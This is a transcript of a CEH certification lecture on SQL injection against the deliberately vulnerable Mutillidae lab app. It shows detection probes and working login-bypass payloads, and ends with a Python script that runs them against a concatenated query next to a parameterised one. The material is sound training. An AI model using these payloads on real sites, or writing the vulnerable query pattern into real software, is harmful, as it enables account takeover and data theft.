EC Council CEH 312-50 V11 – Website Hacking – SQL Injection Vulnerabilities part 1
- What is SQL?
In this lecture and the next few lectures we’re going to be talking about a popular type of vulnerability called SQL injection. Before we start talking about how it works and how to exploit it, let’s first learn what SQL is for. If you’re doing a pen test on a certain website, chances are this website is a bit bigger than a very simple site, so it’s probably using a database. Most websites other than very simple ones use databases. The databases are used to store data: usernames, passwords, news articles, blog posts, pictures. Literally anything that happens on the website is stored in a database, and the web application queries the database and then displays the data to you or to the users on screen.
When the users do something, it will either insert, update or delete the data that exists in the database. This interaction between the web application and the database happens using a language called SQL. So let me show you what I mean by a database. This is just an example, I’m not hacking anything. I’m literally just going to log in to the database that is installed on our Metasploitable machine and then we’re just going to see what’s being stored on it. There is nothing fancy here, just logging into MySQL: I’m putting the username as root, and Metasploitable doesn’t use a password for root, which is really bad, but obviously it’s a vulnerable system.
So I’m just going to log in; I’m not hacking anything, I’m not doing any SQL injections. This is just the MySQL terminal, which lets us talk to the database the same way the web application would. So I’m just trying to show you what I mean by databases and what’s saved in there. The first thing I’m going to do is type in show databases, and that will show us the databases that exist on our target server. We can see that we have information_schema. This is a default database that holds information about all the other databases, so this one gets installed by default when you install MySQL. The rest have been installed for each web application. So we can see we have one for TikiWiki, and we have one called owasp10, which is the one for Mutillidae.
We also have one called mysql, one called metasploit and one for DVWA, which is the web application we’ve been using. So you can see that for each web application we actually have a database, and this database holds the information that is used by that web application. Let me show you what’s in there. I’m going to use the owasp10 database; again, this is the one for Mutillidae, the web application we’re looking at. Each database has tables, and in the tables there is information. So I’m going to say show tables to see the tables that we have. And you can see we have a table for accounts, so you can assume that this table has information about the usernames, passwords and other information about the users.
We have a table for blogs, so it probably has the blog entries, the posts and the comments. In there you can also see captured_data and credit_cards, so there’s a table that contains credit cards. Now this is huge for shopping websites: they actually would have a credit cards table, and the information for the credit cards would be stored there. Basically the database stores all the data that is used on the website, because storing it in files is not efficient. So let’s have a look at the accounts. If I just say select, this is exactly how the web application would be retrieving information from the database; it will be selecting, updating or deleting. So I’m doing a select statement here.
Again, this is not hacking, I’m not doing anything, just selecting stuff. I’m going to select star, which means everything, from accounts. And as we can see, we have the account ID, the username, the password, the signature for the person and whether that person is an admin. Now these columns depend on the table: the person who designs the database also designs the tables and the columns, and then the data gets inserted by the web application. So we can see that we have a user called admin and their password is adminpass.
We can see we have a user called adrian and their password is somepassword. So this is just to show you what databases look like and to get a feel for it, because in the future videos we’re going to try to exploit these databases and get access similar to this. Here I just logged in with a username and a password. Usually you wouldn’t have access like this; only the web admin would have that access. In future videos we’re going to run some attacks in order to gain access similar to this, so that we have full control over the database, so that we can read data and see if we can write or modify things.
- Dangers of SQL Injection Vulnerabilities
So I just want to highlight why SQL injections are so important and so dangerous. The first reason is that they can be found everywhere. A lot of big websites have had this kind of vulnerability, things like Yahoo and Google; they’re very hard to protect against and it’s very easy to make a mistake that leaves them open to exploitation. The other reason they’re very dangerous is that they give you access to the database. In many scenarios, if you find an SQL injection, you really don’t need to upload a PHP shell or get a reverse connection. There is really no point in uploading stuff and increasing the danger of being caught.
Because if you have access to the database, as we saw here, you pretty much have everything you need. You have usernames and passwords, so you can log in with a normal username and password as a normal user, or if you’re looking for sensitive data, we saw that we had access to credit cards. You pretty much can do anything you want, so there’s really no point in trying to further exploit the system. If you found an SQL injection, bingo, that’s all you need really. In many scenarios we actually use a PHP shell to gain access to the database and see if we can read it. Say, for example, you managed to upload a PHP shell on a server that is exploitable, but then you couldn’t access the database.
There isn’t much that you can see: you can’t see credit cards, you can’t see usernames and passwords. Yes, you have control over the server, but you can’t read the data. So sometimes when you upload a PHP shell, the next step is gaining access to the database. Another thing is that SQL injections can be used to do many other things. If you manage to find an SQL injection in a website that is not your target, but is hosted on the same server, then you can use it to read files outside the www root, similar to a file inclusion vulnerability. Or you can use the username and password for the admin and see if you can upload stuff; usually the admin can upload a lot more than just images.
From there you can upload a PHP shell or a backdoor, and then navigate to your target website. In some cases you can even use the SQL injection itself to upload a PHP shell. So basically SQL injections can be used as file inclusion vulnerabilities, they can be used as file upload vulnerabilities, and they also give you access to the whole database. That’s why they are very dangerous and very useful if you manage to find one.
- Discovering SQL injections In POST
Now, to try and discover SQL injections, you need to browse through your target and try to break each page. So whenever you see a text box, or a parameter in the URL, for example page.php?something=something, try to inject stuff there. Try a single quote, try an and statement or an order by statement to break the page and make it look different. I’m going to show you an example here, and I’m going to go to the login page first. It’s asking me to log in. Now I’ve actually registered with my own name, so you can just go in here and register. I have a username called zaid and the password 123456. First I’m going to log in just to show you.
So my username is zaid and my password is 123456, and now I’m logged in as zaid. My signature was aa, nothing real, just a test. So I’m going to log out and we’re back at the login page. The page itself also takes a parameter that you can try to inject into, but we’ll get into that later. At the moment we’re looking at an example of injecting into text boxes, so you can try to inject into the name and into the password. I’m going to put my name as zaid and I’m going to put a single quote as my password. So let’s see if we can break it. And as you can see, there is now an error being displayed to us, and it doesn’t look like a normal error; it looks like a database error. Usually you’d be very lucky to get an error like this.
Usually the error won’t be as informative as this. Sometimes you’ll just see that the page is not acting as you expected; sometimes it’ll just be a page that does not look as it should. For example, if it’s a news page, maybe it will have the article missing, or if it’s a blog it will have one of the posts missing or show different posts. So you need to keep an eye on what’s changing. In this example we are actually getting a really nice error telling us which file the error is in, telling us that there’s a syntax error near the quotation mark that we added, and also showing us the statement that was executed.
This is really good for learning, because now we can see the statement that the system is trying to run. The system is trying to do a select star: it’s trying to select everything from accounts where the username is equal to zaid and the password is equal to a single quote. And note that the web application is already adding quotes around the values. So when I entered zaid, it put zaid between two quotes, and it put the single quote that I added between another two quotes. That’s why we have three quotes there. So from this we can say it’s something like 70% likely that the target website has an SQL injection. We’re still not sure if it will execute what we want it to. So can I actually inject code and get it executed? Let’s see if we can do that.
So the username is going to be zaid again. And for the password, I’m going to put my password, 123456, and then I’m closing the quote myself. Let me explain why. The current statement in the system is select star from accounts where username is equal to zaid and password is equal to, and then it opens a single quote by itself and inserts a variable, let’s call it $password. This variable takes in whatever I put in the password box, and its value gets inserted in place of $password. I’m just giving you an idea; you need to be able to imagine this happening. It takes whatever I put in there, puts it between two single quotes, inserts it into the statement and executes it on the system.
So what I’m doing is putting 123456 and then adding the closing quote myself. Right now the code is going to look like this: select star from accounts where username is equal to zaid and password is equal to 123456, and the quote is closed. Then I’m going to add: and 1 is equal to 1. I’m just trying to see if it’s going to execute what I want it to. So my statement right now is going to be select star from accounts where username is equal to zaid and password is equal to 123456 (with the closing quote inserted by me) and 1 is equal to 1. One problem the system is going to complain about is that there’s an extra quote at the end, the one the application adds itself after whatever I type in the text box.
So it’s going to complain that this quote is opened and never closed. What I’m going to do is add a comment. When you add a comment, everything that comes after the comment will not be executed. I’m going to use the hash as the comment marker, so anything that comes after the hash the system is going to ignore. So what I’m injecting now is: 123456, a closing quote, and 1=1, and a hash. As I said, usually what you have here is a $password variable, or whatever the programmer called it, and we’re just imagining it; my input gets inserted in its place. When you do that, this is what the code is going to look like.
It’s going to contain the right username, the right password, and 1 is equal to 1, which is true. And then it’s going to ignore the extra quote at the end because it’s after the hash. So if we paste this, we should be able to log in. And perfect, we were able to log in, and the username is zaid. So far we haven’t done anything, but this shows us that it is running our code. Now let’s try something different: let’s add a false statement. We did 1 equals 1, which was true, and it executed what we wanted. Let’s try 1 equals 2, which is false. So I have the right password and I have the right username, but I add: and 1 is equal to 2. And this should fail, because it’s false.
1 is not equal to 2, and I’m using an and, so everything has to be true. So it should give me an error even though I’m going to put the right username and the right password. So I’m putting 123456 and 1 is equal to 2. And as you can see, it’s given me an authentication error, bad username or password, even though I gave the right password and the right username. This confirms that this website is actually executing whatever we inject into the password. So we can use the password field to inject SQL code, and it’s always going to take this form: you put a password, close the quote, put the code that you want to execute right after it, and finish with the hash. Whatever you put there is going to be executed on the target system.
- Bypassing Logins Using SQL injection
Okay, so now we know that we can put any code we want in here and it’s going to be executed on the system. So let’s have another look at the statement. It says select star from accounts where username is equal to the username that we put in the form and password is equal to the password that we put in the form. Let’s see if we can use that to log in without even knowing the password. I’m going to do that with the admin. So the username is going to be admin, and I don’t know what the password is for the admin. What I’m going to do is just put anything, any random password, and in the code, where before we were doing and 1 is equal to 1, I’m going to use or instead.
So I’m going to say or 1 is equal to 1. Once I inject this, it’s going to go into the statement like before, and our code is going to look like this: select star from accounts where username is equal to admin and password is equal to aaa, which is wrong, or 1 is equal to 1, which is right. Any time you have an or, if either side of the or condition is true, the whole condition is true. That’s the way an or statement works. So: select star from accounts where username is equal to admin and password is equal to aaa, that’s wrong.
Or 1 is equal to 1. Okay, I’ll accept that. So it’s actually going to execute it and let us log into the admin without even knowing the admin’s password. Let’s try to inject this now. And as you can see, I was able to log in as admin, and monkey is the signature for the admin. Now, bypassing logins can be done in so many ways, depending on the code that’s written on the page, depending on the way you want to do it, and on how you imagine the code looks. In a lot of cases, when you put the single quote here, you won’t see this error message. Sometimes you do see it, which makes your job so much easier. If you don’t, then you kind of need to guess what the statement looks like. So I’m going to show you another example of bypassing.
Instead of injecting the code like this, note that the username parameter is injectable as well. As you saw when I put in the single quote, the username is inserted into the statement exactly the same way as the password, so we can inject code in the username too. Let’s have a look at the statement again, and I’m just going to reset it to the way it would usually look. The username and the password fields are substituted into the username and the password parts of the statement. So let’s try to inject something into the username. I’m going to enter admin as the username, then close the quote myself, and then add a comment.
So when I run this, my statement is going to look like this: select star from accounts where username is equal to admin. I closed the quote myself with the quote I typed, and then I’m adding a comment, so the rest of the statement, including the password check, is not even going to be executed. So the code is effectively select star from accounts where username is equal to admin, and it’s going to let me log in without entering anything meaningful in the password. So let’s do this. I’m going to put my username as admin, close the quote and add a comment.
And then you can put any password you want. I’m just going to put the number 1 and log in. And as you can see, I managed to log in as admin. So again, this is black box testing: you don’t see the code in many cases, so you want to play around with it and see how it responds to you. But the main thing is to test whether the SQL injection exists, and you do that using the method we showed you in the previous video. So try a single quote, try the and statement: try a true and statement, so and 1 is equal to 1, and then a false and statement, such as and 1 is equal to 0 or and 2 is equal to 0. If they behave as expected, then your target has an SQL injection and you can start playing around with it.
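The two procedures above (the true/false probes with and 1=1 / and 1=2, and the two login bypasses with or 1=1 and with a comment after the username) can be reproduced offline against a miniature of the login. The following is an added example, not code from the lecture or from Mutillidae: it builds the accounts table in an in-memory sqlite3 database with constructed rows (admin/adminpass, adrian/somepassword and the lecture’s test user zaid/123456), concatenates the login query exactly the way the error page showed, and runs each payload against both that query and a parameterised one. One assumption to note: sqlite3 does not recognise MySQL’s # comment marker, so the payloads end in `-- ` (with a trailing space), which MySQL accepts as well; the reasoning is otherwise identical.

```python
"""Added example (not from the lecture): the login the lecture probes,
rebuilt on Python's bundled sqlite3 so it runs offline.

sqlite3 does not accept MySQL's `#` comment marker, so the payloads below
end in `-- ` (trailing space), which MySQL accepts too.
"""
import sqlite3

# Constructed sample data modelled on the Mutillidae accounts table:
# id, username, password, signature, is_admin.
ACCOUNTS = [
    (1, "admin", "adminpass", "monkey", 1),
    (2, "adrian", "somepassword", "Zombie Films Rock!", 0),
    (3, "zaid", "123456", "aa", 0),
]


def connect():
    """Build the in-memory database the examples run against."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE accounts (cid INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, mysignature TEXT, is_admin INTEGER)"
    )
    con.executemany("INSERT INTO accounts VALUES (?, ?, ?, ?, ?)", ACCOUNTS)
    return con


def build_vulnerable_query(username, password):
    """The query shape the lecture reconstructs from the error page: the
    application wraps each field in single quotes and concatenates it in,
    so a quote in the input ends the string literal early."""
    return (
        "SELECT * FROM accounts WHERE username='" + username
        + "' AND password='" + password + "'"
    )


def vulnerable_login(con, username, password):
    """Return the first matching row or None; raises on malformed SQL,
    which is what produced the database error shown on the page."""
    return con.execute(build_vulnerable_query(username, password)).fetchone()


def safe_login(con, username, password):
    """Same check with a parameterised query: the values travel separately
    from the SQL text, so quotes in the input stay plain data."""
    return con.execute(
        "SELECT * FROM accounts WHERE username=? AND password=?",
        (username, password),
    ).fetchone()


def probe(con, username, password):
    """Classify the application's reaction the way the lecture does."""
    try:
        row = vulnerable_login(con, username, password)
    except sqlite3.OperationalError:
        return "error"  # the tell-tale database error from the stray quote
    return "logged in as " + row[1] if row else "rejected"


def run_lecture_payloads(con):
    """The lecture's probes and bypasses, in order, against both versions.
    Returns (username, password, vulnerable result, parameterised logged in?)."""
    payloads = [
        ("zaid", "'"),                    # break the statement: database error
        ("zaid", "123456' AND 1=1 -- "),  # true condition: still logs in
        ("zaid", "123456' AND 1=2 -- "),  # false condition: rejected
        ("admin", "aaa' OR 1=1 -- "),     # unknown password: every row matches,
                                          # first row (admin) is returned
        ("admin' -- ", "1"),              # comment out the password check
    ]
    return [
        (user, pw, probe(con, user, pw), safe_login(con, user, pw) is not None)
        for user, pw in payloads
    ]


if __name__ == "__main__":
    for user, pw, vulnerable, safe in run_lecture_payloads(connect()):
        print(f"{user!r:14} {pw!r:26} vulnerable: {vulnerable:20} "
              f"parameterised: {'logged in' if safe else 'rejected'}")
```

Running it shows the same sequence the lecture walks through: the lone quote raises a syntax error, the true probe logs zaid in, the false probe is rejected, and both bypasses return the admin row, while the parameterised version rejects every payload because the input is never parsed as SQL.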